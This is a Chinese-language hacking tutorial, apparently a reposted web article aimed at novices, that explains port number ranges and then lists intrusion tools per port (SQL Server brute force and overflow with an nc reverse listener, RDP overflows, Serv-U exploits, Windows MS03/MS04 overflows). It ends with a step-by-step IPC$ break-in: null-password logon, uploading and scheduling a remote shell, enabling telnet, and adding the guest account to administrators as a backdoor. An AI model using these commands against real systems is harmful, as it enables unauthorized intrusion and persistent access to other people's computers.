經(jīng)典:各個(gè)網(wǎng)絡(luò)端口的入侵方法

字號:

希望對新手入侵有幫助!
    計(jì)算機(jī)"端口"是英文port的義譯,可以認(rèn)為是計(jì)算機(jī)與外界通訊交流的出口。其中硬件領(lǐng)域的端口又稱接口,如:USB端口、串行端口等。軟件領(lǐng)域的端口一般指網(wǎng)絡(luò)中面向連接服務(wù)和無連接服務(wù)的通信協(xié)議端口,是一種抽象的軟件結(jié)構(gòu),包括一些數(shù)據(jù)結(jié)構(gòu)和I/O(基本輸入輸出)緩沖區(qū)。
    按端口號可分為3大類:
    (1)公認(rèn)端口(WellKnownPorts):從0到1023,它們緊密綁定(binding)于一些服務(wù)。通常這些端口的通訊明確表明了某種服務(wù)的協(xié)議。例如:80端口實(shí)際上總是HTTP通訊。
    (2)注冊端口(RegisteredPorts):從1024到49151。它們松散地綁定于一些服務(wù)。也就是說有許多服務(wù)綁定于這些端口,這些端口同樣用于許多其它目的。例如:許多系統(tǒng)處理動(dòng)態(tài)端口從1024左右開始。
    (3)動(dòng)態(tài)和/或私有端口(Dynamicand/orPrivatePorts):從49152到65535。理論上,不應(yīng)為服務(wù)分配這些端口。實(shí)際上,機(jī)器通常從1024起分配動(dòng)態(tài)端口。但也有例外:SUN的RPC端口從32768開始。
    1. 1433端口入侵
    scanport.exe 查有1433的機(jī)器
    SQLScanPass.exe 進(jìn)行字典暴破(字典是關(guān)鍵)
    最后 SQLTools.exe入侵對sql的sp2及以下的系統(tǒng),可用sql的hello 溢出漏洞入侵。
    nc -vv -l -p 本機(jī)端口 sqlhelloF.exe 入侵ip 1433 本機(jī)ip 本機(jī)端口
    (以上反向的,測試成功)
    sqlhelloz.exe 入侵ip 1433 (這個(gè)是正向連接)
    2. 4899端口入侵
    用4899過濾器.exe,掃描空口令的機(jī)器
    3. 3899的入侵
    對很早的機(jī)器,可以試試3389的溢出(win3389ex.exe)
    對2000的機(jī)器,可以試試字典暴破。(tscrack.exe)
    4. 80入侵
    對sp3以前的機(jī)器,可以用webdav入侵;
    對bbs論壇,可以試試上傳漏洞(upfile.exe或dvup_delphi.exe)
    可以利用SQL進(jìn)行注入。(啊D的注入軟件)。
    5. serv-u入侵(21端口)
    對5. 004及以下系統(tǒng),可用溢出入侵。(serv5004.exe)
    對5.1.0.0及以下系統(tǒng),可用本地提升權(quán)限。(servlocal.exe)
    對serv-u的MD5加密密碼,可以用字典暴破。(crack.vbs)
    輸入一個(gè)被serv-u加密的密碼(34位長),通過與字典檔(dict.txt)的比較,得到密碼
    6. 554端口
    用real554.exe入侵。
    7. 6129端口
    用DameWare6129.exe入侵。
    8. 系統(tǒng)漏洞
    利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,進(jìn)行溢出入侵。
    9. 3127等端口
    可以利用doom病毒開的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。
    10. 其他入侵
    利用shanlu的入侵軟件入侵(WINNTAutoAttack.exe)。
    經(jīng)典IPC$入侵
    1. C:\>net use $">\\127.0.0.1\IPC$ "" /user:"admintitrators"
    這是用"流光"掃到的用戶名是administrators,密碼為"空"的IP地址(氣好到家如果是打算攻擊的話,就可以用這樣的命令來與127.0.0.1建立一個(gè)連接,因?yàn)槊艽a為"空",所以第一個(gè)引號處就不用輸入,后面一個(gè)雙引號里的是用戶名,輸入administrators,命令即可成功完成。
    2. C:\>copy srv.exe $">\\127.0.0.1\admin$
    先復(fù)制srv.exe上去,在流光的Tools目錄下就有(這里的$是指admin用戶的c:\winnt\system32\,大家還可以使用c$、d$,意思是C盤與D盤,這看你要復(fù)制到什么地方去了)。
    3. C:\>net time file://127.0.0.1/
    查查時(shí)間,發(fā)現(xiàn)127.0.0.1 的當(dāng)前時(shí)間是 2002/3/19 上午 11:00,命令成功完成。
    4. C:\>at file://127.0.0.1/ 11:05 srv.exe
    用at命令啟動(dòng)srv.exe吧(這里設(shè)置的時(shí)間要比主機(jī)時(shí)間快,不然你怎么啟動(dòng)啊.
    5. C:\>net time file://127.0.0.1/
    再查查到時(shí)間沒有?如果127.0.0.1 的當(dāng)前時(shí)間是 2002/3/19 上午 11:05,那就準(zhǔn)備開始下面的命令。
    6. C:\>telnet 127.0.0.1 99
    這里會用到Telnet命令吧,注意端口是99。Telnet默認(rèn)的是23端口,但是我們使用的是SRV在對方計(jì)算機(jī)中為我們建立一個(gè)99端口的Shell。
    雖然我們可以Telnet上去了,但是SRV是一次性的,下次登錄還要再激活!所以我們打算建立一個(gè)Telnet服務(wù)!這就要用到ntlm了
    7.C:\>copy ntlm.exe $">\\127.0.0.1\admin$
    用Copy命令把ntlm.exe上傳到主機(jī)上(ntlm.exe也是在《流光》的Tools目錄中)。
    8. C:\WINNT\system32>ntlm
    輸入ntlm啟動(dòng)(這里的C:\WINNT\system32>指的是對方計(jì)算機(jī),運(yùn)行ntlm其實(shí)是讓這個(gè)程序在對方計(jì)算機(jī)上運(yùn)行)。當(dāng)出現(xiàn)"DONE"的時(shí)候,就說明已經(jīng)啟動(dòng)正常。然后使用"net start telnet"來開啟Telnet服務(wù)!
    9. Telnet 127.0.0.1,接著輸入用戶名與密碼就進(jìn)入對方了,操作就像在Dos上操作一樣簡單!(然后你想做什么?想做什么就做什么吧,哈哈)為了以防萬一,我們再把guest激活加到管理組
    10. C:\>net user guest /active:yes
    將對方的Guest用戶激活
    11. C:\>net user guest 1234
    將Guest的密碼改為1234,或者你要設(shè)定的密碼
    12. C:\>net localgroup administrators guest /add
    將Guest變?yōu)锳dministrator^_^(如果管理員密碼更改,guest帳號沒改變的話,下次我們可以用guest再次訪問這臺計(jì)算機(jī))